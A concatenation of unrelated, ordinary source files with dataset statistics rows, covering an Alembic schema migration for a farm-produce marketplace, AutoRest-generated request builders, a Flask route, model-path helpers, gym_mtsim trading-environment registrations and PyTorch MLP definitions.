sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email')
)
op.create_table('variables',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('cost_per_km_normal_time', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('cost_per_km_peak_time', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('cost_per_km_scheduled', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('cost_waiting_time', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('vehicle_Type',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=30), nullable=False),
sa.Column('make', sa.String(length=30), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('documents',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('filename', sa.String(length=256), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('farmer_address',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('primary_address', sa.String(length=300), nullable=False),
sa.Column('location', sa.String(length=80), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('loans',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('due_on', sa.DateTime(), nullable=False),
sa.Column('paid_on', sa.DateTime(), nullable=True),
sa.Column('total', sa.Integer(), nullable=True),
sa.Column('paid', sa.Integer(), nullable=True),
sa.Column('status', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('orders',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('consumer', sa.String(length=120), nullable=True),
sa.Column('order_date', sa.DateTime(), nullable=False),
sa.Column('status', sa.Enum('Accepted', 'Delivered', 'Pending', name='order_status'), nullable=False),
sa.Column('lat', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('lng', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_types',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('product_category_id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_category_id'], ['product_categories.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('roles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('transporter_current_location',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('latitude', sa.String(length=80), nullable=True),
sa.Column('longitude', sa.String(length=80), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('transporter_ratings',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('rating', sa.Integer(), nullable=False),
sa.Column('review', sa.String(length=80), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('transporters',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('vehicle_type', sa.String(length=80), nullable=False),
sa.Column('vehicle_reg_no', sa.String(length=80), nullable=False),
sa.Column('vehicle_color', sa.String(length=80), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('vehicle_color')
)
op.create_table('vehicles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('number', sa.String(length=30), nullable=True),
sa.Column('type_id', sa.Integer(), nullable=False),
sa.Column('colour', sa.String(length=30), nullable=True),
sa.Column('expiry_date', sa.DateTime(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['type_id'], ['vehicle_Type.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('colour'),
sa.UniqueConstraint('number')
)
op.create_table('earnings',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('order_id', sa.Integer(), nullable=False),
sa.Column('total', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['order_id'], ['orders.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('payments',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('order_id', sa.Integer(), nullable=False),
sa.Column('payment_method', sa.Enum('Cheque', 'Cash', 'M-pesa', 'Debit Card', 'Credit Card', name='payment_method'), nullable=False),
sa.Column('amount', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['order_id'], ['orders.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_sub_types',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('description', sa.String(length=500), nullable=False),
sa.Column('product_category_id', sa.Integer(), nullable=False),
sa.Column('product_type_id', sa.Integer(), nullable=False),
sa.Column('photo', sa.String(length=500), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_category_id'], ['product_categories.id'], ),
sa.ForeignKeyConstraint(['product_type_id'], ['product_types.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('trips',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('order_id', sa.Integer(), nullable=False),
sa.Column('status', sa.Enum('Accepted', 'Rejected', 'Started', 'Finished', 'Pending', name='trip_status'), nullable=False),
sa.Column('lat', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('lng', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['order_id'], ['orders.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('products',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('product_category_id', sa.Integer(), nullable=False),
sa.Column('product_type_id', sa.Integer(), nullable=False),
sa.Column('product_sub_type_id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('description', sa.String(length=500), nullable=False),
sa.Column('packaging', sa.String(length=80), nullable=False),
sa.Column('price', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('photo', sa.String(length=500), nullable=False),
sa.Column('lat', sa.Numeric(precision=9, scale=6), nullable=True),
sa.Column('lng', sa.Numeric(precision=9, scale=6), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_category_id'], ['product_categories.id'], ),
sa.ForeignKeyConstraint(['product_sub_type_id'], ['product_sub_types.id'], ),
sa.ForeignKeyConstraint(['product_type_id'], ['product_types.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('cart',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('user', sa.Integer(), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('total', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('deliveries',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('purchase_date', sa.DateTime(), nullable=False),
sa.Column('transporter', sa.Integer(), nullable=False),
sa.Column('status', sa.Enum('Accepted', 'Delivered', 'Pending', name='status_delivery'), nullable=False),
sa.Column('lat', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('lng', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('total', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('farmers',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('id_number', sa.Integer(), nullable=True),
sa.Column('photo', sa.String(length=80), nullable=True),
sa.Column('product_id', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_ratings',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('rating', sa.Integer(), nullable=False),
sa.Column('review', sa.String(length=80), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('purchases',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('user', sa.Integer(), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('total', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('shopping_list',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('branches',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('farmer_id', sa.Integer(), nullable=True),
sa.Column('location', sa.String(length=300), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['farmer_id'], ['farmers.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('branches')
op.drop_table('shopping_list')
op.drop_table('purchases')
op.drop_table('product_ratings')
op.drop_table('farmers')
op.drop_table('deliveries')
op.drop_table('cart')
op.drop_table('products')
op.drop_table('trips')
op.drop_table('product_sub_types')
op.drop_table('payments')
op.drop_table('earnings')
op.drop_table('vehicles')
op.drop_table('transporters')
op.drop_table('transporter_ratings')
op.drop_table('transporter_current_location')
op.drop_table('roles')
op.drop_table('product_types')
op.drop_table('orders')
op.drop_table('loans')
op.drop_table('farmer_address')
op.drop_table('documents')
op.drop_table('vehicle_Type')
op.drop_table('variables')
op.drop_table('users')
op.drop_table('product_categories')
op.drop_table('locations')
op.drop_table('counties')
# ### end Alembic commands ###

# File: test/vanilla/low-level/Expected/AcceptanceTests/BodyDateTimeLowLevel/bodydatetimelowlevel/rest/datetime/__init__.py (cfculhane/autorest.python, MIT)
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._request_builders_py3 import build_get_null_request
from ._request_builders_py3 import build_get_invalid_request
from ._request_builders_py3 import build_get_overflow_request
from ._request_builders_py3 import build_get_underflow_request
from ._request_builders_py3 import build_put_utc_max_date_time_request
from ._request_builders_py3 import build_put_utc_max_date_time7_digits_request
from ._request_builders_py3 import build_get_utc_lowercase_max_date_time_request
from ._request_builders_py3 import build_get_utc_uppercase_max_date_time_request
from ._request_builders_py3 import build_get_utc_uppercase_max_date_time7_digits_request
from ._request_builders_py3 import build_put_local_positive_offset_max_date_time_request
from ._request_builders_py3 import build_get_local_positive_offset_lowercase_max_date_time_request
from ._request_builders_py3 import build_get_local_positive_offset_uppercase_max_date_time_request
from ._request_builders_py3 import build_put_local_negative_offset_max_date_time_request
from ._request_builders_py3 import build_get_local_negative_offset_uppercase_max_date_time_request
from ._request_builders_py3 import build_get_local_negative_offset_lowercase_max_date_time_request
from ._request_builders_py3 import build_put_utc_min_date_time_request
from ._request_builders_py3 import build_get_utc_min_date_time_request
from ._request_builders_py3 import build_put_local_positive_offset_min_date_time_request
from ._request_builders_py3 import build_get_local_positive_offset_min_date_time_request
from ._request_builders_py3 import build_put_local_negative_offset_min_date_time_request
from ._request_builders_py3 import build_get_local_negative_offset_min_date_time_request
from ._request_builders_py3 import build_get_local_no_offset_min_date_time_request
except (SyntaxError, ImportError):
from ._request_builders import build_get_null_request # type: ignore
from ._request_builders import build_get_invalid_request # type: ignore
from ._request_builders import build_get_overflow_request # type: ignore
from ._request_builders import build_get_underflow_request # type: ignore
from ._request_builders import build_put_utc_max_date_time_request # type: ignore
from ._request_builders import build_put_utc_max_date_time7_digits_request # type: ignore
from ._request_builders import build_get_utc_lowercase_max_date_time_request # type: ignore
from ._request_builders import build_get_utc_uppercase_max_date_time_request # type: ignore
from ._request_builders import build_get_utc_uppercase_max_date_time7_digits_request # type: ignore
from ._request_builders import build_put_local_positive_offset_max_date_time_request # type: ignore
from ._request_builders import build_get_local_positive_offset_lowercase_max_date_time_request # type: ignore
from ._request_builders import build_get_local_positive_offset_uppercase_max_date_time_request # type: ignore
from ._request_builders import build_put_local_negative_offset_max_date_time_request # type: ignore
from ._request_builders import build_get_local_negative_offset_uppercase_max_date_time_request # type: ignore
from ._request_builders import build_get_local_negative_offset_lowercase_max_date_time_request # type: ignore
from ._request_builders import build_put_utc_min_date_time_request # type: ignore
from ._request_builders import build_get_utc_min_date_time_request # type: ignore
from ._request_builders import build_put_local_positive_offset_min_date_time_request # type: ignore
from ._request_builders import build_get_local_positive_offset_min_date_time_request # type: ignore
from ._request_builders import build_put_local_negative_offset_min_date_time_request # type: ignore
from ._request_builders import build_get_local_negative_offset_min_date_time_request # type: ignore
from ._request_builders import build_get_local_no_offset_min_date_time_request # type: ignore
__all__ = [
"build_get_null_request",
"build_get_invalid_request",
"build_get_overflow_request",
"build_get_underflow_request",
"build_put_utc_max_date_time_request",
"build_put_utc_max_date_time7_digits_request",
"build_get_utc_lowercase_max_date_time_request",
"build_get_utc_uppercase_max_date_time_request",
"build_get_utc_uppercase_max_date_time7_digits_request",
"build_put_local_positive_offset_max_date_time_request",
"build_get_local_positive_offset_lowercase_max_date_time_request",
"build_get_local_positive_offset_uppercase_max_date_time_request",
"build_put_local_negative_offset_max_date_time_request",
"build_get_local_negative_offset_uppercase_max_date_time_request",
"build_get_local_negative_offset_lowercase_max_date_time_request",
"build_put_utc_min_date_time_request",
"build_get_utc_min_date_time_request",
"build_put_local_positive_offset_min_date_time_request",
"build_get_local_positive_offset_min_date_time_request",
"build_put_local_negative_offset_min_date_time_request",
"build_get_local_negative_offset_min_date_time_request",
"build_get_local_no_offset_min_date_time_request",
]
| 71.8375 | 114 | 0.835914 | 813 | 5,747 | 5.211562 | 0.088561 | 0.09063 | 0.169932 | 0.114704 | 0.914798 | 0.901581 | 0.892141 | 0.860751 | 0.817088 | 0.725513 | 0 | 0.005649 | 0.106664 | 5,747 | 79 | 115 | 72.746835 | 0.819634 | 0.128415 | 0 | 0 | 0 | 0 | 0.20245 | 0.20245 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.642857 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
aae877ff69f2b146deb54358ecfaf09274153a2d | 76 | py | Python | ips/ip/pwm_out/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/pwm_out/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/pwm_out/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | from pwm_out_partial import get_ip_name
from pwm_out_partial import PWM_OUT

# File: httpd/app/routes.py (flavio-fernandes/basic-lb, MIT)
from app import app
] | null | null | null | from app import app
import os
@app.route('/')
def index():
return os.environ.get("MSG", "Hello, World!")
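
The route body only reads the environment, so its fallback behavior can be checked without Flask. A stdlib-only sketch — the `greeting` helper is hypothetical and simply mirrors the route's return expression:

```python
import os

def greeting():
    # Same expression as the route: the MSG env var wins, the literal is the fallback.
    return os.environ.get("MSG", "Hello, World!")

os.environ.pop("MSG", None)   # ensure the variable is unset
print(greeting())             # Hello, World!

os.environ["MSG"] = "Hi from the load balancer"
print(greeting())             # Hi from the load balancer
```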

# File: utils/util.py (michelefontana92/HOLDA, MIT)
import os
def create_model_name(path, global_id, local_id, personalized=False):
base_dir = os.path.dirname(path)
filename = os.path.basename(path)
filename_split = filename.split('.')
if personalized:
save_model_path = f'{base_dir}/personalized_{filename_split[0]}_{global_id}_{local_id}.{filename_split[1]}'
else:
save_model_path = f'{base_dir}/{filename_split[0]}_{global_id}_{local_id}.{filename_split[1]}'
return save_model_path
def create_model_name_state(path, state_id, personalized=False):
base_dir = os.path.dirname(path)
filename = os.path.basename(path)
filename_split = filename.split('.')
if personalized:
save_model_path = f'{base_dir}/personalized_state_{filename_split[0]}_{state_id}.{filename_split[1]}'
else:
save_model_path = f'{base_dir}/state_{filename_split[0]}_{state_id}.{filename_split[1]}'
return save_model_path
def create_model_name_monitor(path, state_id, input=True):
base_dir = os.path.dirname(path)
filename = os.path.basename(path)
filename_split = filename.split('.')
if input:
save_model_path = f'{base_dir}/monitor_{filename_split[0]}_{state_id}_in.{filename_split[1]}'
else:
save_model_path = f'{base_dir}/monitor_{filename_split[0]}_{state_id}_out.{filename_split[1]}'
return save_model_path
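
All three helpers follow the same pattern — split the filename on its dot, interpolate IDs, rejoin — so the scheme can be expressed once with `os.path.splitext`, which also tolerates filenames without an extension. A sketch, not part of the original module; `build_model_name` is a hypothetical generalization:

```python
import os

def build_model_name(path, *ids, prefix=''):
    # Hypothetical generalization of the three helpers above:
    # insert a prefix and any number of IDs between the stem and the extension.
    base_dir = os.path.dirname(path)
    stem, ext = os.path.splitext(os.path.basename(path))
    suffix = '_'.join(str(i) for i in ids)
    return f'{base_dir}/{prefix}{stem}_{suffix}{ext}'

print(build_model_name('ckpt/model.pt', 3, 1))                       # ckpt/model_3_1.pt
print(build_model_name('ckpt/model.pt', 5, prefix='personalized_'))  # ckpt/personalized_model_5.pt
```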

# File: gym_mtsim/__init__.py (webclinic017/gym-mtsim, MIT)
from gym.envs.registration import register
from .metatrader import Timeframe, SymbolInfo
from .simulator import MtSimulator, OrderType, Order, SymbolNotFound, OrderNotFound
from .envs import MtEnv
from .data import FOREX_DATA_PATH, STOCKS_DATA_PATH, CRYPTO_DATA_PATH, MIXED_DATA_PATH
register(
id='forex-hedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=FOREX_DATA_PATH, hedge=True),
'trading_symbols': ['EURUSD', 'GBPCAD', 'USDJPY'],
'window_size': 10,
'symbol_max_orders': 2,
'fee': lambda symbol: 0.03 if 'JPY' in symbol else 0.0003
}
)
register(
id='forex-unhedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=FOREX_DATA_PATH, hedge=False),
'trading_symbols': ['EURUSD', 'GBPCAD', 'USDJPY'],
'window_size': 10,
'fee': lambda symbol: 0.03 if 'JPY' in symbol else 0.0003
}
)
register(
id='stocks-hedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=STOCKS_DATA_PATH, hedge=True),
'trading_symbols': ['GOGL', 'AAPL', 'TSLA', 'MSFT'],
'window_size': 10,
'symbol_max_orders': 2,
'fee': 0.2
}
)
register(
id='stocks-unhedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=STOCKS_DATA_PATH, hedge=False),
'trading_symbols': ['GOGL', 'AAPL', 'TSLA', 'MSFT'],
'window_size': 10,
'fee': 0.2
}
)
register(
id='crypto-hedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=CRYPTO_DATA_PATH, hedge=True),
'trading_symbols': ['BTCUSD', 'ETHUSD', 'BCHUSD'],
'window_size': 10,
'symbol_max_orders': 2,
'fee': lambda symbol: {
'BTCUSD': 50.0,
'ETHUSD': 3.0,
'BCHUSD': 0.5,
}[symbol]
}
)
register(
id='crypto-unhedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=CRYPTO_DATA_PATH, hedge=False),
'trading_symbols': ['BTCUSD', 'ETHUSD', 'BCHUSD'],
'window_size': 10,
'fee': lambda symbol: {
'BTCUSD': 50.0,
'ETHUSD': 3.0,
'BCHUSD': 0.5,
}[symbol]
}
)
register(
id='mixed-hedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=MIXED_DATA_PATH, hedge=True),
'trading_symbols': ['EURUSD', 'USDCAD', 'GOGL', 'AAPL', 'BTCUSD', 'ETHUSD'],
'window_size': 10,
'symbol_max_orders': 2,
'fee': lambda symbol: {
'EURUSD': 0.0002,
'USDCAD': 0.0005,
'GOGL': 0.15,
'AAPL': 0.01,
'BTCUSD': 50.0,
'ETHUSD': 3.0,
}[symbol]
}
)
register(
id='mixed-unhedge-v0',
entry_point='gym_mtsim.envs:MtEnv',
kwargs={
'original_simulator': MtSimulator(symbols_filename=MIXED_DATA_PATH, hedge=False),
'trading_symbols': ['EURUSD', 'USDCAD', 'GOGL', 'AAPL', 'BTCUSD', 'ETHUSD'],
'window_size': 10,
'fee': lambda symbol: {
'EURUSD': 0.0002,
'USDCAD': 0.0005,
'GOGL': 0.15,
'AAPL': 0.01,
'BTCUSD': 50.0,
'ETHUSD': 3.0,
}[symbol]
}
)

# File: dlutils/models/pytorch/MLPNetwork.py (chelseajohn/dlapplication, Apache-2.0)
import torch.nn as nn
import torch
import torch.nn.functional as F
import torch.optim as optim
import torch.nn.init as init
import numpy as np
import random
class MLPNet(nn.Module):
def __init__(self):
super(MLPNet, self).__init__()
torch.manual_seed(7)
torch.cuda.manual_seed_all(7)
np.random.seed(7)
random.seed(7)
torch.backends.cudnn.deterministic=True
self.fc1 = nn.Linear(150, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
return x
def __str__(self):
return "MLP 2 layered"
class DeepMLPNet(nn.Module):
def __init__(self):
super(DeepMLPNet, self).__init__()
torch.manual_seed(7)
torch.cuda.manual_seed_all(7)
np.random.seed(7)
random.seed(7)
torch.backends.cudnn.deterministic=True
self.fc1 = nn.Linear(150, 150)
init.xavier_normal_(self.fc1.weight.data)
init.zeros_(self.fc1.bias.data)
self.fc2 = nn.Linear(150, 100)
init.xavier_normal_(self.fc2.weight.data)
init.zeros_(self.fc2.bias.data)
self.fc3 = nn.Linear(100, 100)
init.xavier_normal_(self.fc3.weight.data)
init.zeros_(self.fc3.bias.data)
self.fc4 = nn.Linear(100, 50)
init.xavier_normal_(self.fc4.weight.data)
init.zeros_(self.fc4.bias.data)
self.fc5 = nn.Linear(50, 50)
init.xavier_normal_(self.fc5.weight.data)
init.zeros_(self.fc5.bias.data)
self.fc6 = nn.Linear(50, 25)
init.xavier_normal_(self.fc6.weight.data)
init.zeros_(self.fc6.bias.data)
self.fc7 = nn.Linear(25, 25)
init.xavier_normal_(self.fc7.weight.data)
init.zeros_(self.fc7.bias.data)
self.fc8 = nn.Linear(25, 25)
init.xavier_normal_(self.fc8.weight.data)
init.zeros_(self.fc8.bias.data)
self.fc9 = nn.Linear(25, 10)
init.xavier_normal_(self.fc9.weight.data)
init.zeros_(self.fc9.bias.data)
self.fc10 = nn.Linear(10, 10)
init.xavier_normal_(self.fc10.weight.data)
init.zeros_(self.fc10.bias.data)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
x = F.relu(self.fc6(x))
x = F.relu(self.fc7(x))
x = F.relu(self.fc8(x))
x = F.relu(self.fc9(x))
x = F.relu(self.fc10(x))
return x
def __str__(self):
return "MLP 10 layered"
class OneOutputMLPNet(nn.Module):
def __init__(self):
super(OneOutputMLPNet, self).__init__()
torch.manual_seed(7)
torch.cuda.manual_seed_all(7)
np.random.seed(7)
random.seed(7)
torch.backends.cudnn.deterministic=True
self.fc1 = nn.Linear(150, 150)
init.xavier_normal_(self.fc1.weight.data)
init.zeros_(self.fc1.bias.data)
self.fc2 = nn.Linear(150, 150)
init.xavier_normal_(self.fc2.weight.data)
init.zeros_(self.fc2.bias.data)
self.fc3 = nn.Linear(150, 100)
init.xavier_normal_(self.fc3.weight.data)
init.zeros_(self.fc3.bias.data)
self.fc4 = nn.Linear(100, 100)
init.xavier_normal_(self.fc4.weight.data)
init.zeros_(self.fc4.bias.data)
self.fc5 = nn.Linear(100, 50)
init.xavier_normal_(self.fc5.weight.data)
init.zeros_(self.fc5.bias.data)
self.fc6 = nn.Linear(50, 25)
init.xavier_normal_(self.fc6.weight.data)
init.zeros_(self.fc6.bias.data)
self.fc7 = nn.Linear(25, 10)
init.xavier_normal_(self.fc7.weight.data)
init.zeros_(self.fc7.bias.data)
self.fc8 = nn.Linear(10, 1)
init.xavier_normal_(self.fc8.weight.data)
init.zeros_(self.fc8.bias.data)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
x = F.relu(self.fc6(x))
x = F.relu(self.fc7(x))
x = F.relu(self.fc8(x))
return x
def __str__(self):
return "MLP with 1 output"
class WideOneOutputMLPNet(nn.Module):
def __init__(self):
super(WideOneOutputMLPNet, self).__init__()
torch.manual_seed(7)
torch.cuda.manual_seed_all(7)
np.random.seed(7)
random.seed(7)
torch.backends.cudnn.deterministic=True
self.fc1 = nn.Linear(150, 200)
init.xavier_normal_(self.fc1.weight.data)
init.zeros_(self.fc1.bias.data)
self.fc2 = nn.Linear(200, 250)
init.xavier_normal_(self.fc2.weight.data)
init.zeros_(self.fc2.bias.data)
self.fc3 = nn.Linear(250, 100)
init.xavier_normal_(self.fc3.weight.data)
init.zeros_(self.fc3.bias.data)
self.fc4 = nn.Linear(100, 50)
init.xavier_normal_(self.fc4.weight.data)
init.zeros_(self.fc4.bias.data)
self.fc5 = nn.Linear(50, 1)
init.xavier_normal_(self.fc5.weight.data)
init.zeros_(self.fc5.bias.data)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = F.relu(self.fc5(x))
return x
def __str__(self):
return "MLP with wide layers"

# File: src/Genome/alignment/SubseqIndex.py (jbhangoo/jbhangoo.github.io, Apache-2.0)
import bisect
from size import backend_size
def test_size_scrot():
    backend_size('scrot')
